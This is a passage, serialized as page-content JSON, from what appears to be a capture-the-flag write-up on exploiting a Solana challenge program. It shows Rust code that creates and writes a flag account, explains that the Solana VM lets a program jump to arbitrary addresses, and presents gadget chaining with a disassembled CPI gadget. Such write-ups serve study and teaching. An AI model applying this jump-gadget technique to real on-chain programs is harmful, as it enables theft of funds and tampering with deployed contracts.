account.",{"type":26,"tag":35,"props":45740,"children":45741},{},[45742],{"type":32,"value":45743},"A sample program that does this is as follows:",{"type":26,"tag":5512,"props":45745,"children":45747},{"className":5552,"code":45746,"language":5551,"meta":7,"style":7},"pub fn process_instruction(\n    program_id: &Pubkey,\n    accounts: &[AccountInfo],\n    data: &[u8]\n) -> ProgramResult {\n    let flag_pda_ai = &accounts[0];\n    let user_ai = &accounts[1];\n\n    // Step 1: Create a new account with 0x1337 bytes of data\n    let instruction = Instruction::new_with_bincode(\n        system_program::ID,\n        &SystemInstruction::CreateAccount {\n            space: 0x1337,\n            lamports: Rent::default().minimum_balance(0x1337),\n            owner: chall::ID\n        },\n        vec![\n            AccountMeta::new(*user_ai.key, true),\n            AccountMeta::new(*flag_pda_ai.key, true),\n        ],\n    );\n    invoke_signed_unchecked(\n        &instruction,\n        &[\n            user_ai.clone(),\n            flag_pda_ai.clone(),\n        ],\n        &[&[\"FLAG\".as_ref()]],\n    )?;\n\n    // Step 2: Write 0x4337 to the first 8 bytes of the account\n    flag_pda_ai.try_borrow_mut_data()?[..8].copy_from_slice(&0x4337u64.to_le_bytes());\n\n    Ok(())\n}\n",[45748],{"type":26,"tag":130,"props":45749,"children":45750},{"__ignoreMap":7},[45751,45771,45795,45823,45851,45871,45907,45943,45950,45958,45991,46008,46033,46054,46106,46131,46138,46151,46197,46241,46249,46257,46268,46284,46295,46315,46335,46342,46378,46393,46400,46408,46487,46494,46505],{"type":26,"tag":137,"props":45752,"children":45753},{"class":5559,"line":5560},[45754,45758,45762,45767],{"type":26,"tag":137,"props":45755,"children":45756},{"style":5573},[45757],{"type":32,"value":16281},{"type":26,"tag":137,"props":45759,"children":45760},{"style":5573},[45761],{"type":32,"value":16286},{"type":26,"tag":137,"props":45763,"children":45764},{"style":5682},[45765],{"type":32,"value":45766}," process_instruction",{"type":26,"tag":137,"props":45768,"children":45769},{"style":5601},[45770],{"type":32,"value":6054},{"type":26,"tag":137,"props":45772,"children":45773},{"class":5559,"line":5412},[45774,45779,45783,45787,45791],{"type":26,"tag":137,"props":45775,"children":45776},{"style":5584},[45777],{"type":32,"value":45778},"    program_id",{"type":26,"tag":137,"props":45780,"children":45781},{"style":5590},[45782],{"type":32,"value":7072},{"type":26,"tag":137,"props":45784,"children":45785},{"style":5590},[45786],{"type":32,"value":9725},{"type":26,"tag":137,"props":45788,"children":45789},{"style":6009},[45790],{"type":32,"value":23991},{"type":26,"tag":137,"props":45792,"children":45793},{"style":5601},[45794],{"type":32,"value":6099},{"type":26,"tag":137,"props":45796,"children":45797},{"class":5559,"line":5417},[45798,45803,45807,45811,45815,45819],{"type":26,"tag":137,"props":45799,"children":45800},{"style":5584},[45801],{"type":32,"value":45802},"    accounts",{"type":26,"tag":137,"props":45804,"children":45805},{"style":5590},[45806],{"type":32,"value":7072},{"type":26,"tag":137,"props":45808,"children":45809},{"style":5590},[45810],{"type":32,"value":9725},{"type":26,"tag":137,"props":45812,"children":45813},{"style":5601},[45814],{"type":32,"value":3016},{"type":26,"tag":137,"props":45816,"children":45817},{"style":6009},[45818],{"type":32,"value":17530},{"type":26,"tag":137,"props":45820,"children":45821},{"style":5601},[45822],{"type":32,"value":16854},{"type":26,"tag":137,"props":45824,"children":45825},{"class":5559,"line":5642},[45826,45831,45835,45839,45843,45847],{"type":26,"tag":137,"props":45827,"children":45828},{"style":5584},[45829],{"type":32,"value":45830},"    data",{"type":26,"tag":137,"props":45832,"children":45833},{"style":5590},[45834],{"type":32,"value":7072},{"type":26,"tag":137,"props":45836,"children":45837},{"style":5590},[45838],{"type":32,"value":9725},{"type":26,"tag":137,"props":45840,"children":45841},{"style":5601},[45842],{"type":32,"value":3016},{"type":26,"tag":137,"props":45844,"children":45845},{"style":6009},[45846],{"type":32,"value":6012},{"type":26,"tag":137,"props":45848,"children":45849},{"style":5601},[45850],{"type":32,"value":14363},{"type":26,"tag":137,"props":45852,"children":45853},{"class":5559,"line":5745},[45854,45858,45862,45867],{"type":26,"tag":137,"props":45855,"children":45856},{"style":5601},[45857],{"type":32,"value":5671},{"type":26,"tag":137,"props":45859,"children":45860},{"style":5590},[45861],{"type":32,"value":16348},{"type":26,"tag":137,"props":45863,"children":45864},{"style":6009},[45865],{"type":32,"value":45866}," ProgramResult",{"type":26,"tag":137,"props":45868,"children":45869},{"style":5601},[45870],{"type":32,"value":5875},{"type":26,"tag":137,"props":45872,"children":45873},{"class":5559,"line":5850},[45874,45878,45883,45887,45891,45895,45899,45903],{"type":26,"tag":137,"props":45875,"children":45876},{"style":5573},[45877],{"type":32,"value":5576},{"type":26,"tag":137,"props":45879,"children":45880},{"style":5584},[45881],{"type":32,"value":45882}," flag_pda_ai",{"type":26,"tag":137,"props":45884,"children":45885},{"style":5590},[45886],{"type":32,"value":5593},{"type":26,"tag":137,"props":45888,"children":45889},{"style":5590},[45890],{"type":32,"value":9725},{"type":26,"tag":137,"props":45892,"children":45893},{"style":5584},[45894],{"type":32,"value":17266},{"type":26,"tag":137,"props":45896,"children":45897},{"style":5601},[45898],{"type":32,"value":3016},{"type":26,"tag":137,"props":45900,"children":45901},{"style":5626},[45902],{"type":32,"value":1817},{"type":26,"tag":137,"props":45904,"children":45905},{"style":5601},[45906],{"type":32,"value":34169},{"type":26,"tag":137,"props":45908,"children":45909},{"class":5559,"line":5878},[45910,45914,45919,45923,45927,45931,45935,45939],{"type":26,"tag":137,"props":45911,"children":45912},{"style":5573},[45913],{"type":32,"value":5576},{"type":26,"tag":137,"props":45915,"children":45916},{"style":5584},[45917],{"type":32,"value":45918}," user_ai",{"type":26,"tag":137,"props":45920,"children":45921},{"style":5590},[45922],{"type":32,"value":5593},{"type":26,"tag":137,"props":45924,"children":45925},{"style":5590},[45926],{"type":32,"value":9725},{"type":26,"tag":137,"props":45928,"children":45929},{"style":5584},[45930],{"type":32,"value":17266},{"type":26,"tag":137,"props":45932,"children":45933},{"style":5601},[45934],{"type":32,"value":3016},{"type":26,"tag":137,"props":45936,"children":45937},{"style":5626},[45938],{"type":32,"value":878},{"type":26,"tag":137,"props":45940,"children":45941},{"style":5601},[45942],{"type":32,"value":34169},{"type":26,"tag":137,"props":45944,"children":45945},{"class":5559,"line":5891},[45946],{"type":26,"tag":137,"props":45947,"children":45948},{"emptyLinePlaceholder":18},[45949],{"type":32,"value":6276},{"type":26,"tag":137,"props":45951,"children":45952},{"class":5559,"line":5909},[45953],{"type":26,"tag":137,"props":45954,"children":45955},{"style":5564},[45956],{"type":32,"value":45957},"    // Step 1: Create a new account with 0x1337 bytes of data\n",{"type":26,"tag":137,"props":45959,"children":45960},{"class":5559,"line":5930},[45961,45965,45970,45974,45978,45982,45987],{"type":26,"tag":137,"props":45962,"children":45963},{"style":5573},[45964],{"type":32,"value":5576},{"type":26,"tag":137,"props":45966,"children":45967},{"style":5584},[45968],{"type":32,"value":45969}," instruction",{"type":26,"tag":137,"props":45971,"children":45972},{"style":5590},[45973],{"type":32,"value":5593},{"type":26,"tag":137,"props":45975,"children":45976},{"style":6009},[45977],{"type":32,"value":43609},{"type":26,"tag":137,"props":45979,"children":45980},{"style":5590},[45981],{"type":32,"value":6072},{"type":26,"tag":137,"props":45983,"children":45984},{"style":5682},[45985],{"type":32,"value":45986},"new_with_bincode",{"type":26,"tag":137,"props":45988,"children":45989},{"style":5601},[45990],{"type":32,"value":6054},{"type":26,"tag":137,"props":45992,"children":45993},{"class":5559,"line":5939},[45994,45999,46003],{"type":26,"tag":137,"props":45995,"children":45996},{"style":5601},[45997],{"type":32,"value":45998},"        system_program",{"type":26,"tag":137,"props":46000,"children":46001},{"style":5590},[46002],{"type":32,"value":6072},{"type":26,"tag":137,"props":46004,"children":46005},{"style":5601},[46006],{"type":32,"value":46007},"ID,\n",{"type":26,"tag":137,"props":46009,"children":46010},{"class":5559,"line":6191},[46011,46015,46020,46024,46029],{"type":26,"tag":137,"props":46012,"children":46013},{"style":5590},[46014],{"type":32,"value":6062},{"type":26,"tag":137,"props":46016,"children":46017},{"style":5601},[46018],{"type":32,"value":46019},"SystemInstruction",{"type":26,"tag":137,"props":46021,"children":46022},{"style":5590},[46023],{"type":32,"value":6072},{"type":26,"tag":137,"props":46025,"children":46026},{"style":6009},[46027],{"type":32,"value":46028},"CreateAccount",{"type":26,"tag":137,"props":46030,"children":46031},{"style":5601},[46032],{"type":32,"value":5875},{"type":26,"tag":137,"props":46034,"children":46035},{"class":5559,"line":6208},[46036,46041,46045,46050],{"type":26,"tag":137,"props":46037,"children":46038},{"style":5584},[46039],{"type":32,"value":46040},"            space",{"type":26,"tag":137,"props":46042,"children":46043},{"style":5590},[46044],{"type":32,"value":7072},{"type":26,"tag":137,"props":46046,"children":46047},{"style":5626},[46048],{"type":32,"value":46049}," 0x1337",{"type":26,"tag":137,"props":46051,"children":46052},{"style":5601},[46053],{"type":32,"value":6099},{"type":26,"tag":137,"props":46055,"children":46056},{"class":5559,"line":6225},[46057,46062,46066,46071,46075,46080,46084,46088,46093,46097,46102],{"type":26,"tag":137,"props":46058,"children":46059},{"style":5584},[46060],{"type":32,"value":46061},"            lamports",{"type":26,"tag":137,"props":46063,"children":46064},{"style":5590},[46065],{"type":32,"value":7072},{"type":26,"tag":137,"props":46067,"children":46068},{"style":5601},[46069],{"type":32,"value":46070}," Rent",{"type":26,"tag":137,"props":46072,"children":46073},{"style":5590},[46074],{"type":32,"value":6072},{"type":26,"tag":137,"props":46076,"children":46077},{"style":5682},[46078],{"type":32,"value":46079},"default",{"type":26,"tag":137,"props":46081,"children":46082},{"style":5601},[46083],{"type":32,"value":16470},{"type":26,"tag":137,"props":46085,"children":46086},{"style":5590},[46087],{"type":32,"value":470},{"type":26,"tag":137,"props":46089,"children":46090},{"style":5682},[46091],{"type":32,"value":46092},"minimum_balance",{"type":26,"tag":137,"props":46094,"children":46095},{"style":5601},[46096],{"type":32,"value":165},{"type":26,"tag":137,"props":46098,"children":46099},{"style":5626},[46100],{"type":32,"value":46101},"0x1337",{"type":26,"tag":137,"props":46103,"children":46104},{"style":5601},[46105],{"type":32,"value":9320},{"type":26,"tag":137,"props":46107,"children":46108},{"class":5559,"line":6238},[46109,46114,46118,46122,46126],{"type":26,"tag":137,"props":46110,"children":46111},{"style":5584},[46112],{"type":32,"value":46113},"            owner",{"type":26,"tag":137,"props":46115,"children":46116},{"style":5590},[46117],{"type":32,"value":7072},{"type":26,"tag":137,"props":46119,"children":46120},{"style":5601},[46121],{"type":32,"value":44641},{"type":26,"tag":137,"props":46123,"children":46124},{"style":5590},[46125],{"type":32,"value":6072},{"type":26,"tag":137,"props":46127,"children":46128},{"style":5601},[46129],{"type":32,"value":46130},"ID\n",{"type":26,"tag":137,"props":46132,"children":46133},{"class":5559,"line":6247},[46134],{"type":26,"tag":137,"props":46135,"children":46136},{"style":5601},[46137],{"type":32,"value":27965},{"type":26,"tag":137,"props":46139,"children":46140},{"class":5559,"line":6270},[46141,46146],{"type":26,"tag":137,"props":46142,"children":46143},{"style":5682},[46144],{"type":32,"value":46145},"        vec!",{"type":26,"tag":137,"props":46147,"children":46148},{"style":5601},[46149],{"type":32,"value":46150},"[\n",{"type":26,"tag":137,"props":46152,"children":46153},{"class":5559,"line":6279},[46154,46159,46163,46167,46171,46175,46180,46184,46189,46193],{"type":26,"tag":137,"props":46155,"children":46156},{"style":5601},[46157],{"type":32,"value":46158},"            AccountMeta",{"type":26,"tag":137,"props":46160,"children":46161},{"style":5590},[46162],{"type":32,"value":6072},{"type":26,"tag":137,"props":46164,"children":46165},{"style":5682},[46166],{"type":32,"value":17714},{"type":26,"tag":137,"props":46168,"children":46169},{"style":5601},[46170],{"type":32,"value":165},{"type":26,"tag":137,"props":46172,"children":46173},{"style":5590},[46174],{"type":32,"value":7152},{"type":26,"tag":137,"props":46176,"children":46177},{"style":5584},[46178],{"type":32,"value":46179},"user_ai",{"type":26,"tag":137,"props":46181,"children":46182},{"style":5590},[46183],{"type":32,"value":470},{"type":26,"tag":137,"props":46185,"children":46186},{"style":5601},[46187],{"type":32,"value":46188},"key, ",{"type":26,"tag":137,"props":46190,"children":46191},{"style":5573},[46192],{"type":32,"value":146},{"type":26,"tag":137,"props":46194,"children":46195},{"style":5601},[46196],{"type":32,"value":9320},{"type":26,"tag":137,"props":46198,"children":46199},{"class":5559,"line":6288},[46200,46204,46208,46212,46216,46220,46225,46229,46233,46237],{"type":26,"tag":137,"props":46201,"children":46202},{"style":5601},[46203],{"type":32,"value":46158},{"type":26,"tag":137,"props":46205,"children":46206},{"style":5590},[46207],{"type":32,"value":6072},{"type":26,"tag":137,"props":46209,"children":46210},{"style":5682},[46211],{"type":32,"value":17714},{"type":26,"tag":137,"props":46213,"children":46214},{"style":5601},[46215],{"type":32,"value":165},{"type":26,"tag":137,"props":46217,"children":46218},{"style":5590},[46219],{"type":32,"value":7152},{"type":26,"tag":137,"props":46221,"children":46222},{"style":5584},[46223],{"type":32,"value":46224},"flag_pda_ai",{"type":26,"tag":137,"props":46226,"children":46227},{"style":5590},[46228],{"type":32,"value":470},{"type":26,"tag":137,"props":46230,"children":46231},{"style":5601},[46232],{"type":32,"value":46188},{"type":26,"tag":137,"props":46234,"children":46235},{"style":5573},[46236],{"type":32,"value":146},{"type":26,"tag":137,"props":46238,"children":46239},{"style":5601},[46240],{"type":32,"value":9320},{"type":26,"tag":137,"props":46242,"children":46243},{"class":5559,"line":6355},[46244],{"type":26,"tag":137,"props":46245,"children":46246},{"style":5601},[46247],{"type":32,"value":46248},"        ],\n",{"type":26,"tag":137,"props":46250,"children":46251},{"class":5559,"line":6363},[46252],{"type":26,"tag":137,"props":46253,"children":46254},{"style":5601},[46255],{"type":32,"value":46256},"    );\n",{"type":26,"tag":137,"props":46258,"children":46259},{"class":5559,"line":6393},[46260,46264],{"type":26,"tag":137,"props":46261,"children":46262},{"style":5682},[46263],{"type":32,"value":43726},{"type":26,"tag":137,"props":46265,"children":46266},{"style":5601},[46267],{"type":32,"value":6054},{"type":26,"tag":137,"props":46269,"children":46270},{"class":5559,"line":6401},[46271,46275,46280],{"type":26,"tag":137,"props":46272,"children":46273},{"style":5590},[46274],{"type":32,"value":6062},{"type":26,"tag":137,"props":46276,"children":46277},{"style":5584},[46278],{"type":32,"value":46279},"instruction",{"type":26,"tag":137,"props":46281,"children":46282},{"style":5601},[46283],{"type":32,"value":6099},{"type":26,"tag":137,"props":46285,"children":46286},{"class":5559,"line":6433},[46287,46291],{"type":26,"tag":137,"props":46288,"children":46289},{"style":5590},[46290],{"type":32,"value":6062},{"type":26,"tag":137,"props":46292,"children":46293},{"style":5601},[46294],{"type":32,"value":46150},{"type":26,"tag":137,"props":46296,"children":46297},{"class":5559,"line":6441},[46298,46303,46307,46311],{"type":26,"tag":137,"props":46299,"children":46300},{"style":5584},[46301],{"type":32,"value":46302},"            user_ai",{"type":26,"tag":137,"props":46304,"children":46305},{"style":5590},[46306],{"type":32,"value":470},{"type":26,"tag":137,"props":46308,"children":46309},{"style":5682},[46310],{"type":32,"value":18011},{"type":26,"tag":137,"props":46312,"children":46313},{"style":5601},[46314],{"type":32,"value":6082},{"type":26,"tag":137,"props":46316,"children":46317},{"class":5559,"line":6501},[46318,46323,46327,46331],{"type":26,"tag":137,"props":46319,"children":46320},{"style":5584},[46321],{"type":32,"value":46322},"            flag_pda_ai",{"type":26,"tag":137,"props":46324,"children":46325},{"style":5590},[46326],{"type":32,"value":470},{"type":26,"tag":137,"props":46328,"children":46329},{"style":5682},[46330],{"type":32,"value":18011},{"type":26,"tag":137,"props":46332,"children":46333},{"style":5601},[46334],{"type":32,"value":6082},{"type":26,"tag":137,"props":46336,"children":46337},{"class":5559,"line":11634},[46338],{"type":26,"tag":137,"props":46339,"children":46340},{"style":5601},[46341],{"type":32,"value":46248},{"type":26,"tag":137,"props":46343,"children":46344},{"class":5559,"line":11652},[46345,46349,46353,46357,46361,46365,46369,46373],{"type":26,"tag":137,"props":46346,"children":46347},{"style":5590},[46348],{"type":32,"value":6062},{"type":26,"tag":137,"props":46350,"children":46351},{"style":5601},[46352],{"type":32,"value":3016},{"type":26,"tag":137,"props":46354,"children":46355},{"style":5590},[46356],{"type":32,"value":5694},{"type":26,"tag":137,"props":46358,"children":46359},{"style":5601},[46360],{"type":32,"value":3016},{"type":26,"tag":137,"props":46362,"children":46363},{"style":6837},[46364],{"type":32,"value":45221},{"type":26,"tag":137,"props":46366,"children":46367},{"style":5590},[46368],{"type":32,"value":470},{"type":26,"tag":137,"props":46370,"children":46371},{"style":5682},[46372],{"type":32,"value":45230},{"type":26,"tag":137,"props":46374,"children":46375},{"style":5601},[46376],{"type":32,"value":46377},"()]],\n",{"type":26,"tag":137,"props":46379,"children":46380},{"class":5559,"line":11697},[46381,46385,46389],{"type":26,"tag":137,"props":46382,"children":46383},{"style":5601},[46384],{"type":32,"value":6253},{"type":26,"tag":137,"props":46386,"children":46387},{"style":5590},[46388],{"type":32,"value":5737},{"type":26,"tag":137,"props":46390,"children":46391},{"style":5601},[46392],{"type":32,"value":5604},{"type":26,"tag":137,"props":46394,"children":46395},{"class":5559,"line":11803},[46396],{"type":26,"tag":137,"props":46397,"children":46398},{"emptyLinePlaceholder":18},[46399],{"type":32,"value":6276},{"type":26,"tag":137,"props":46401,"children":46402},{"class":5559,"line":26089},[46403],{"type":26,"tag":137,"props":46404,"children":46405},{"style":5564},[46406],{"type":32,"value":46407},"    // Step 2: Write 0x4337 to the first 8 bytes of the account\n",{"type":26,"tag":137,"props":46409,"children":46410},{"class":5559,"line":26124},[46411,46416,46420,46424,46428,46432,46436,46440,46444,46448,46452,46457,46461,46465,46470,46474,46478,46483],{"type":26,"tag":137,"props":46412,"children":46413},{"style":5584},[46414],{"type":32,"value":46415},"    flag_pda_ai",{"type":26,"tag":137,"props":46417,"children":46418},{"style":5590},[46419],{"type":32,"value":470},{"type":26,"tag":137,"props":46421,"children":46422},{"style":5682},[46423],{"type":32,"value":16465},{"type":26,"tag":137,"props":46425,"children":46426},{"style":5601},[46427],{"type":32,"value":16470},{"type":26,"tag":137,"props":46429,"children":46430},{"style":5590},[46431],{"type":32,"value":5737},{"type":26,"tag":137,"props":46433,"children":46434},{"style":5601},[46435],{"type":32,"value":3016},{"type":26,"tag":137,"props":46437,"children":46438},{"style":5590},[46439],{"type":32,"value":5634},{"type":26,"tag":137,"props":46441,"children":46442},{"style":5626},[46443],{"type":32,"value":6663},{"type":26,"tag":137,"props":46445,"children":46446},{"style":5601},[46447],{"type":32,"value":3079},{"type":26,"tag":137,"props":46449,"children":46450},{"style":5590},[46451],{"type":32,"value":470},{"type":26,"tag":137,"props":46453,"children":46454},{"style":5682},[46455],{"type":32,"value":46456},"copy_from_slice",{"type":26,"tag":137,"props":46458,"children":46459},{"style":5601},[46460],{"type":32,"value":165},{"type":26,"tag":137,"props":46462,"children":46463},{"style":5590},[46464],{"type":32,"value":5694},{"type":26,"tag":137,"props":46466,"children":46467},{"style":5626},[46468],{"type":32,"value":46469},"0x4337",{"type":26,"tag":137,"props":46471,"children":46472},{"style":6009},[46473],{"type":32,"value":10627},{"type":26,"tag":137,"props":46475,"children":46476},{"style":5590},[46477],{"type":32,"value":470},{"type":26,"tag":137,"props":46479,"children":46480},{"style":5682},[46481],{"type":32,"value":46482},"to_le_bytes",{"type":26,"tag":137,"props":46484,"children":46485},{"style":5601},[46486],{"type":32,"value":18016},{"type":26,"tag":137,"props":46488,"children":46489},{"class":5559,"line":26132},[46490],{"type":26,"tag":137,"props":46491,"children":46492},{"emptyLinePlaceholder":18},[46493],{"type":32,"value":6276},{"type":26,"tag":137,"props":46495,"children":46496},{"class":5559,"line":26140},[46497,46501],{"type":26,"tag":137,"props":46498,"children":46499},{"style":6009},[46500],{"type":32,"value":16924},{"type":26,"tag":137,"props":46502,"children":46503},{"style":5601},[46504],{"type":32,"value":16929},{"type":26,"tag":137,"props":46506,"children":46507},{"class":5559,"line":26149},[46508],{"type":26,"tag":137,"props":46509,"children":46510},{"style":5601},[46511],{"type":32,"value":6507},{"type":26,"tag":35,"props":46513,"children":46514},{},[46515],{"type":32,"value":46516},"To test this theory, we can execute the program above inside the test environment, and see if we can get the flag:",{"type":26,"tag":35,"props":46518,"children":46519},{},[46520],{"type":26,"tag":2210,"props":46521,"children":46524},{"alt":46522,"src":46523},"Screenshot","/posts/jumping-around-in-the-vm/screenshot.png",[],{"type":26,"tag":35,"props":46526,"children":46527},{},[46528],{"type":32,"value":46529},"It works! Now we \"just\" need to find a way to execute the program above, by leveraging the single Instruction call to the program. This is easier said than done. The next section will dive into the details of the Solana VM to understand how we can achieve this.",{"type":26,"tag":92,"props":46531,"children":46533},{"id":46532},"solution-implementation",[46534],{"type":32,"value":46535},"Solution Implementation",{"type":26,"tag":35,"props":46537,"children":46538},{},[46539,46541,46546],{"type":32,"value":46540},"Now that we know what we need to do, let's look at how we can actually do it. We have to code the above program, by chaining together multiple ",{"type":26,"tag":130,"props":46542,"children":46544},{"className":46543},[],[46545],{"type":32,"value":38277},{"type":32,"value":46547}," invocations:",{"type":26,"tag":5512,"props":46549,"children":46553},{"className":46550,"code":46551,"language":46552,"meta":7,"style":7},"language-mermaid shiki shiki-themes slack-dark","graph LR\n    A[0: entrypoint] --> B[1: process_instruction]\n    B --> C[2: process]\n    C --> D[3: gadget1]\n    C --> E[3: process]\n    E --> F[4: gadget2]\n    E --> G[...]\n","mermaid",[46554],{"type":26,"tag":130,"props":46555,"children":46556},{"__ignoreMap":7},[46557,46565,46573,46581,46589,46597,46605],{"type":26,"tag":137,"props":46558,"children":46559},{"class":5559,"line":5560},[46560],{"type":26,"tag":137,"props":46561,"children":46562},{},[46563],{"type":32,"value":46564},"graph LR\n",{"type":26,"tag":137,"props":46566,"children":46567},{"class":5559,"line":5412},[46568],{"type":26,"tag":137,"props":46569,"children":46570},{},[46571],{"type":32,"value":46572},"    A[0: entrypoint] --> B[1: process_instruction]\n",{"type":26,"tag":137,"props":46574,"children":46575},{"class":5559,"line":5417},[46576],{"type":26,"tag":137,"props":46577,"children":46578},{},[46579],{"type":32,"value":46580},"    B --> C[2: process]\n",{"type":26,"tag":137,"props":46582,"children":46583},{"class":5559,"line":5642},[46584],{"type":26,"tag":137,"props":46585,"children":46586},{},[46587],{"type":32,"value":46588},"    C --> D[3: gadget1]\n",{"type":26,"tag":137,"props":46590,"children":46591},{"class":5559,"line":5745},[46592],{"type":26,"tag":137,"props":46593,"children":46594},{},[46595],{"type":32,"value":46596},"    C --> E[3: process]\n",{"type":26,"tag":137,"props":46598,"children":46599},{"class":5559,"line":5850},[46600],{"type":26,"tag":137,"props":46601,"children":46602},{},[46603],{"type":32,"value":46604},"    E --> F[4: gadget2]\n",{"type":26,"tag":137,"props":46606,"children":46607},{"class":5559,"line":5878},[46608],{"type":26,"tag":137,"props":46609,"children":46610},{},[46611],{"type":32,"value":46612},"    E --> G[...]\n",{"type":26,"tag":35,"props":46614,"children":46615},{},[46616],{"type":32,"value":46617},"What are those gadgets? The Solana VM does not enforce that the target of a jump is a valid one, meaning that it's possible to jump to arbitrary addresses!",{"type":26,"tag":35,"props":46619,"children":46620},{},[46621,46623,46629],{"type":32,"value":46622},"To mimic the execution of our solution, we need a gadget that lets us CPI into system_program, with parameters we control. How do we obtain those? We can use ",{"type":26,"tag":41,"props":46624,"children":46626},{"href":43084,"rel":46625},[45],[46627],{"type":32,"value":46628},"Binary Ninja",{"type":32,"value":46630}," to find a suitable gadget for this.",{"type":26,"tag":35,"props":46632,"children":46633},{},[46634,46636,46643],{"type":32,"value":46635},"Before throwing the on-chain program to binja, it's useful to find a way to get symbols for it. One solution is to patch the cargo-build-sbf command to ",{"type":26,"tag":41,"props":46637,"children":46640},{"href":46638,"rel":46639},"https://github.com/solana-labs/solana/blob/4ee5078e5ffdfff36d3f7920217788e2892c1a85/sdk/cargo-build-sbf/src/main.rs#L789",[45],[46641],{"type":32,"value":46642},"skip the strip pass",{"type":32,"value":470},{"type":26,"tag":118,"props":46645,"children":46647},{"id":46646},"cpi-gadget",[46648],{"type":32,"value":46649},"CPI Gadget",{"type":26,"tag":35,"props":46651,"children":46652},{},[46653,46655,46660,46662,46669,46671,46677],{"type":32,"value":46654},"Looking at the program source, one idea is to look for the cpi gadget around the ",{"type":26,"tag":130,"props":46656,"children":46658},{"className":46657},[],[46659],{"type":32,"value":40892},{"type":32,"value":46661}," function. This function calls into the solana sdk's function ",{"type":26,"tag":41,"props":46663,"children":46666},{"href":46664,"rel":46665},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/program.rs#L295-L310",[45],[46667],{"type":32,"value":46668},"invoke_signed_unchecked",{"type":32,"value":46670},", yielding a powerful gadget at the address ",{"type":26,"tag":130,"props":46672,"children":46674},{"className":46673},[],[46675],{"type":32,"value":46676},"0x100001ba8",{"type":32,"value":470},{"type":26,"tag":5512,"props":46679,"children":46681},{"className":5552,"code":46680,"language":5551,"meta":7,"style":7},"solana_program::program::invoke_signed_unchecked\n100001ba8  79a278ff00000000   ldxdw r2, [r10-136] {var_88}\n100001bb0  79a380ff00000000   ldxdw r3, [r10-128] {var_80}\n100001bb8  79a468ff00000000   ldxdw r4, [r10-152] {var_98}\n100001bc0  79a570ff00000000   ldxdw r5, [r10-144] {var_90}\n100001bc8  8520000020100000   call sol_invoke_signed_rust\n100001bd0  5500040000000000   jne \u003C+4> r0, 0x0\n\n100001bd8  b701000018000000   mov r1, 0x18\n100001be0  79a288ff00000000   ldxdw r2, [r10-120] {var_78}\n100001be8  6312000000000000   stxw [r2-0], r1  {0x18}\n100001bf0  0500030000000000   ja \u003C+3>\n\n100001bf8  79a188ff00000000   ldxdw r1, [r10-120] {var_78}\n100001c00  bf02000000000000   mov r2, r0\n100001c08  8510000075000000   call _ZN94_$LT$solana_program...$u64$GT$$GT$4from17ha0d289b72861b06dE\n\n100001c10  79a2b8ff00000000   ldxdw r2, [r10-72] {var_48}\n100001c18  1502040000000000   jeq \u003C+4> r2, 0x0\n\n100001c20  2702000022000000   mul r2, 0x22\n100001c28  79a1b0ff00000000   ldxdw r1, [r10-80] {var_50}\n100001c30  b703000001000000   mov r3, 0x1\n100001c38  8510000003feffff   call __rust_dealloc\n\n100001c40  79a2d0ff00000000   ldxdw r2, [r10-48] {var_30}\n100001c48  1502030000000000   jeq \u003C+3> r2, 0x0\n\n100001c50  79a1c8ff00000000   ldxdw r1, [r10-56] {var_38}\n100001c58  b703000001000000   mov r3, 0x1\n100001c60  85100000fefdffff   call __rust_dealloc\n\n100001c68  9500000000000000   exit {__return_addr}\n",[46682],{"type":26,"tag":130,"props":46683,"children":46684},{"__ignoreMap":7},[46685,46710,46766,46817,46869,46921,46944,46992,46999,47031,47082,47140,47174,47181,47230,47260,47335,47342,47393,47439,47446,47477,47528,47558,47580,47587,47638,47683,47690,47741,47769,47790,47797],{"type":26,"tag":137,"props":46686,"children":46687},{"class":5559,"line":5560},[46688,46692,46696,46701,46705],{"type":26,"tag":137,"props":46689,"children":46690},{"style":5601},[46691],{"type":32,"value":16244},{"type":26,"tag":137,"props":46693,"children":46694},{"style":5590},[46695],{"type":32,"value":6072},{"type":26,"tag":137,"props":46697,"children":46698},{"style":5601},[46699],{"type":32,"value":46700},"program",{"type":26,"tag":137,"props":46702,"children":46703},{"style":5590},[46704],{"type":32,"value":6072},{"type":26,"tag":137,"props":46706,"children":46707},{"style":5584},[46708],{"type":32,"value":46709},"invoke_signed_unchecked\n",{"type":26,"tag":137,"props":46711,"children":46712},{"class":5559,"line":5412},[46713,46718,46723,46728,46733,46738,46743,46747,46752,46757,46762],{"type":26,"tag":137,"props":46714,"children":46715},{"style":5584},[46716],{"type":32,"value":46717},"100001ba8",{"type":26,"tag":137,"props":46719,"children":46720},{"style":5584},[46721],{"type":32,"value":46722},"  79a278ff00000000",{"type":26,"tag":137,"props":46724,"children":46725},{"style":5584},[46726],{"type":32,"value":46727},"   ldxdw",{"type":26,"tag":137,"props":46729,"children":46730},{"style":5584},[46731],{"type":32,"value":46732}," r2",{"type":26,"tag":137,"props":46734,"children":46735},{"style":5601},[46736],{"type":32,"value":46737},", [",{"type":26,"tag":137,"props":46739,"children":46740},{"style":5584},[46741],{"type":32,"value":46742},"r10",{"type":26,"tag":137,"props":46744,"children":46745},{"style":5590},[46746],{"type":32,"value":6908},{"type":26,"tag":137,"props":46748,"children":46749},{"style":5626},[46750],{"type":32,"value":46751},"136",{"type":26,"tag":137,"props":46753,"children":46754},{"style":5601},[46755],{"type":32,"value":46756},"] {",{"type":26,"tag":137,"props":46758,"children":46759},{"style":5584},[46760],{"type":32,"value":46761},"var_88",{"type":26,"tag":137,"props":46763,"children":46764},{"style":5601},[46765],{"type":32,"value":6507},{"type":26,"tag":137,"props":46767,"children":46768},{"class":5559,"line":5417},[46769,46774,46779,46783,46788,46792,46796,46800,46804,46808,46813],{"type":26,"tag":137,"props":46770,"children":46771},{"style":5584},[46772],{"type":32,"value":46773},"100001bb0",{"type":26,"tag":137,"props":46775,"children":46776},{"style":5584},[46777],{"type":32,"value":46778},"  79a380ff00000000",{"type":26,"tag":137,"props":46780,"children":46781},{"style":5584},[46782],{"type":32,"value":46727},{"type":26,"tag":137,"props":46784,"children":46785},{"style":5584},[46786],{"type":32,"value":46787}," 